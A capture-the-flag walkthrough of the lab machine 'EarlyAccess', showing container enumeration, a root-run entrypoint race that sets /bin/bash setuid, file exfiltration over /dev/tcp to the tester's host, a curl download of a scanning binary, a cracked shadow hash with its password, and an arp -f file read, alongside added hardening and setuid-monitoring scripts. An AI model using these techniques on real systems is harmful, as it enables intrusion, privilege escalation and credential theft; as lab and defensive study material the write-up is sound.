172.18.0.0      0.0.0.0         255.255.0.0     U     0      0        0 br-21b7766aaedb  
172.19.0.0      0.0.0.0         255.255.0.0     U     0      0        0 br-ffc3c4811c09  
IP address       HW type     Flags       HW address            Mask     Device  
10.10.10.2       0x1         0x2         00:50:56:b9:09:33     *        ens160  
172.18.0.102     0x1         0x2         02:42:ac:12:00:66     *        br-21b7766aaedb  
172.19.0.4       0x1         0x2         02:42:ac:13:00:04     *        br-ffc3c4811c09  
172.18.0.2       0x1         0x2         02:42:ac:12:00:02     *        br-21b7766aaedb
[+] Checking if containerd(ctr) is available  
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation  
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it  
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"  
  
[+] Checking if runc is available  
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation  
runc was found in /usr/bin/runc, you may be able to escalate privileges with it  
  
[+] Searching docker files  
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket  
srw-rw---- 1 root docker 0 Jan  7 09:12 /run/docker.sock
[+] Modified interesting files in the last 5mins (limit 100)  
/var/log/lastlog  
/var/log/apache2/access-ssl.log  
/var/log/syslog  
/var/log/messages  
/var/log/daemon.log  
/var/log/user.log  
/var/log/auth.log  
/var/log/wtmp  
/home/drew/.gnupg/pubring.kbx  
/home/drew/.gnupg/crls.d/DIR.txt  
/home/drew/.gnupg/trustdb.gpg  
/opt/docker-entrypoint.d/node-server.sh
[+] Mails (limit 50)  
 400314      4 -rw-r--r--   1 root     mail          678 Jul 14 12:26 /var/mail/drew  
 400314      4 -rw-r--r--   1 root     mail          678 Jul 14 12:26 /var/spool/mail/drew

cat /var/mail/drew:

To: <drew@earlyaccess.htb>
Subject: Game-server crash fixes
From: game-adm <game-adm@earlyaccess.htb>
Date: Thu May 27 8:10:34 2021


Hi Drew!

Thanks again for taking the time to test this very early version of our newest project!
We have received your feedback and implemented a healthcheck that will automatically restart the game-server if it has crashed (sorry for the current instability of the game! We are working on it...) 
If the game hangs now, the server will restart and be available again after about a minute.

If you find any other problems, please don't hesitate to report them!

Thank you for your efforts!
Game-adm (and the entire EarlyAccess Studios team).

cat /var/spool/mail/drew: same file as /var/mail/drew above (both carry inode 400314 in the find listing), so the contents are identical.

id_rsa.pub:

ssh-rsa AAAAB3NzaC1yc****************************************************7nvettGYr5lcS8w== game-tester@game-server

The key comment says game-tester@game-server.

uname -a:

Linux earlyaccess 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux

Nmap binary: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

Local VM:

python3 -m http.server

Machine VM:

cd /tmp
curl 10.10.14.12:8000/nmap -o nmap
chmod +x nmap
ip addr | grep 172
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-ca136e98e231
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-681dd3ec01e5
./nmap -oA output/ -n 172.19.0.1/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-02-15 07:18 CET
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.19.0.1
Host is up (0.00027s latency).
Not shown: 1204 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap scan report for 172.19.0.2
Host is up (0.00030s latency).
All 1207 scanned ports on 172.19.0.2 are closed

Nmap scan report for 172.19.0.3
Host is up (0.00032s latency).
Not shown: 1206 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.03 seconds
ssh game-tester@172.19.0.3

Listening ports (ss -lntp):

ss -lntp
State       Recv-Q Send-Q                         Local Address:Port                                        Peer Address:Port              
LISTEN      0      128                                        *:22                                                     *:*                  
LISTEN      0      128                               127.0.0.11:33699                                                  *:*                  
LISTEN      0      128                                        *:9999                                                   *:*                  
LISTEN      0      128                                       :::22                                                    :::*       

In the existing ssh session, use the ~C escape prefix and add the forward:

-L 9999:172.19.0.3:9999

game-tester@game-server:/$ cat entrypoint.sh:

#!/bin/bash
for ep in /docker-entrypoint.d/*; do
  if [ -x "${ep}" ]; then
    echo "Running: ${ep}"
    "${ep}" &
  fi
done
tail -f /dev/null
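The entrypoint above starts every executable it finds in the directory as root, and the directory is bind-mounted from a location the unprivileged host user can write to. As an added example (not the game-server's own entrypoint.sh, and not code from these notes), here is the same loop with ownership and permission checks in front of it: a file that is a symlink, is not owned by the expected uid, or is writable by group or others is reported and skipped rather than launched. It assumes GNU coreutils (stat -c) on Linux; the names ENTRYPOINT_DIR, ENTRYPOINT_OWNER_UID and the function names are chosen here.

```shell
#!/bin/sh
# Added example, not the game-server's own entrypoint.sh: the "run every
# executable in the entrypoint directory" loop with ownership and permission
# checks in front of it, so that a file dropped into a bind-mounted
# directory by an unprivileged host user is skipped instead of being
# started as root.  Assumes GNU coreutils (stat -c) on Linux.

ENTRYPOINT_DIR="${ENTRYPOINT_DIR:-/docker-entrypoint.d}"
# Expected owner of the directory and of every script (root by default);
# overridable so the checks can be exercised as a normal user.
ENTRYPOINT_OWNER_UID="${ENTRYPOINT_OWNER_UID:-0}"

# mode_has_group_or_other_write PERMS -> 0 if the symbolic mode string as
# printed by "stat -c %A" (e.g. -rwxrwxr-x) grants write to group or others.
mode_has_group_or_other_write() {
    case "$1" in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# path_is_trusted PATH -> 0 if PATH is not a symlink, is owned by
# ENTRYPOINT_OWNER_UID and is not writable by group or others.
path_is_trusted() {
    p="$1"
    if [ -L "$p" ]; then
        echo "reject $p: symlink" >&2
        return 1
    fi
    info=$(stat -c '%u %A' "$p") || return 1
    owner=${info%% *}
    perms=${info#* }
    if [ "$owner" != "$ENTRYPOINT_OWNER_UID" ]; then
        echo "reject $p: owned by uid $owner, expected $ENTRYPOINT_OWNER_UID" >&2
        return 1
    fi
    if mode_has_group_or_other_write "$perms"; then
        echo "reject $p: mode $perms is group/other writable" >&2
        return 1
    fi
    return 0
}

# list_runnable DIR -> prints, one per line, the executables in DIR that
# pass the checks.  The directory itself must pass them too; otherwise
# nothing is run at all (exit status 1).
list_runnable() {
    dir="$1"
    if ! path_is_trusted "$dir"; then
        echo "refusing to run anything from $dir" >&2
        return 1
    fi
    for ep in "$dir"/*; do
        [ -e "$ep" ] || continue      # empty directory: the glob stays literal
        [ -x "$ep" ] || continue      # same filter as the original loop
        if [ ! -f "$ep" ] || ! path_is_trusted "$ep"; then
            continue
        fi
        echo "$ep"
    done
    return 0
}

# run_entrypoints DIR -> launch each trusted executable in the background,
# exactly as the original loop does.
run_entrypoints() {
    list_runnable "$1" | while read -r ep; do
        echo "Running: $ep"
        "$ep" &
    done
}
```

In the container the original `for` loop would be replaced by `run_entrypoints "$ENTRYPOINT_DIR"` followed by the same `tail -f /dev/null`. The directory check matters as much as the per-file check: the weakness on this box is not a bad script but a directory that a non-root host user can populate, and a group- or world-writable mount fails that check before any file is considered.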

Back as drew, in drew@earlyaccess:/opt/docker-entrypoint.d:

vi exec.sh

exec.sh

#!/bin/bash

chmod 4755 /bin/bash

It does not show up on the game-tester side.

drew (Machine VM), loop saved as test.sh:

while true; do
	cp exec.sh /opt/docker-entrypoint.d/
done
bash test.sh

game-tester VM (with drew's loop running alongside):

drew@earlyaccess:/tmp$ vi test.sh
drew@earlyaccess:/tmp$ bash test.sh

game-tester@game-server:~$ ls /docker-entrypoint.d/
exec.sh  node-server.sh
game-tester@game-server:~$
cat /docker-entrypoint.d/node-server.sh
find . | grep server.js
find . 2>/dev/null | grep server.js

game-tester@game-server:/usr/src/app/server.js

# Local VM
nc -lvnp 9001 > out

# Machine VM game-tester
cat server.js > /dev/tcp/10.10.14.12/9001

Change rounds=-1.

When the server goes down:

game-tester@game-server:~$ Connection to 172.19.0.3 closed by remote host.
Connection to 172.19.0.3 closed.
./nmap -oA output/ -n 172.19.0.1/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-02-15 08:13 CET
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.19.0.1
Host is up (0.00026s latency).
Not shown: 1204 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap scan report for 172.19.0.2
Host is up (0.00029s latency).
All 1207 scanned ports on 172.19.0.2 are closed

Nmap scan report for 172.19.0.3
Host is up (0.00031s latency).
Not shown: 1206 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
172.19.0.3
ssh game-tester@172.19.0.3


drew@earlyaccess:/tmp$ ssh game-tester@172.19.0.3
Linux game-server 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 15 07:09:11 2022 from 172.19.0.1
-bash-4.4$ 
bash -p
id

uid=1001(game-tester) gid=1001(game-tester) euid=0(root) groups=1001(game-tester)
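The euid=0 shell above exists because exec.sh left /bin/bash setuid in the container. As an added example (not part of these notes), here is the kind of setuid/setgid baseline check a host integrity monitor runs to catch exactly that: record the list once when the image or host is built, then diff the current list against it. It assumes GNU find and stat on Linux; the function names suid_list and suid_new are chosen here.

```shell
#!/bin/sh
# Added example, not part of the original notes: a setuid/setgid baseline
# check.  A "chmod 4755 /bin/bash" run by the container as root appears as
# a new entry in the list of setuid files, so comparing the current list
# with one recorded at build time surfaces it.  Assumes GNU find/stat.

# suid_list ROOT -> sorted "path mode" lines for every regular file below
# ROOT (same filesystem only) with the setuid or setgid bit set.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%n %a' {} + 2>/dev/null | sort
}

# suid_new BASELINE ROOT -> prints entries of "suid_list ROOT" that are not
# in BASELINE (a file written earlier by suid_list).  Exit status 1 when
# anything new is found, 0 when the tree still matches its baseline.
suid_new() {
    current=$(mktemp) || return 2
    suid_list "$2" > "$current"
    added=$(comm -13 "$1" "$current")
    rm -f "$current"
    if [ -n "$added" ]; then
        printf '%s\n' "$added"
        return 1
    fi
    return 0
}
```

Typical use is `suid_list / > /var/lib/suid.baseline` at build time and `suid_new /var/lib/suid.baseline /` from cron or a health check; a non-zero exit with `/bin/bash 4755` in the output is the signal. The same diff also flags a setuid copy of a shell placed somewhere else, which a check of /bin/bash alone would miss.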

cd /etc/
cat shadow
game-adm:$6$zbRQg.JO7dBWcZ$DWEKGCPIilhzWjJ/N0WRp.FNArirqqzEMeHTaA8DAJjPdu8h52v0UZncJD8Df.0ncf6X2mjKYnH19RfGRneWX/:18822:0:99999:7:::
vi hashes
# add the hash
$6$zbRQg.JO7dBWcZ$DWEKGCPIilhzWjJ/N0WRp.FNArirqqzEMeHTaA8DAJjPdu8h52v0UZncJD8Df.0ncf6X2mjKYnH19RfGRneWX/

# then:
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

# result
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA384"
Use the "--format=HMAC-SHA384" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
gamemaster       (?)
1g 0:00:00:25 DONE (2022-02-15 02:20) 0.03913g/s 526.0p/s 526.0c/s 526.0C/s handball..waiting
Use the "--show" option to display all of the cracked passwords reliably
Session completed

gamemaster

su - game-adm
# id 
uid=1001(game-adm) gid=1001(game-adm) groups=1001(game-adm),4(adm)

# ./arp -an
? (172.19.0.4) at 02:42:ac:13:00:04 [ether] on br-af44398bdb65
? (10.10.10.2) at 00:50:56:b9:64:63 [ether] on ens160
? (172.18.0.2) at 02:42:ac:12:00:02 [ether] on br-2fa8dd3cbbb



cd /usr/sbin
./arp -v -f /root/root.txt

# root.txt
7096b*************